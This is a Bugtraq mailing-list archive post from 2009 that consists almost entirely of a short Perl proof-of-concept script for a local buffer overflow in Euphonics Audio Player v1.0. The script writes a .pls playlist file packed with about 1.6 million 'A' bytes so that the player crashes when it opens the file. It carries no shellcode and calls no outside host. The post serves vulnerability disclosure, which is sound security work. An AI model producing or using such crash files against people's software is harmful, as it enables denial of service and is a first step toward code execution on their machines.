Bugtraq mailing list archives

Euphonics Audio Player v1.0 (.pls) Local BOF POC


From: darkb0x97 () googlemail com
Date: 3 Feb 2009 23:16:17 -0000

#!/usr/bin/perl -w
#By DarkB0X
#HomePage : http://NullArea.Net
#contact : darkb0x97 () googlemail com




my $file="dark.pls";

$accessviolation = "\x41\x41\x41\x41" x 408973 ;
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $accessviolation ;
close($FILE);
print "$file creation finished";


Current thread: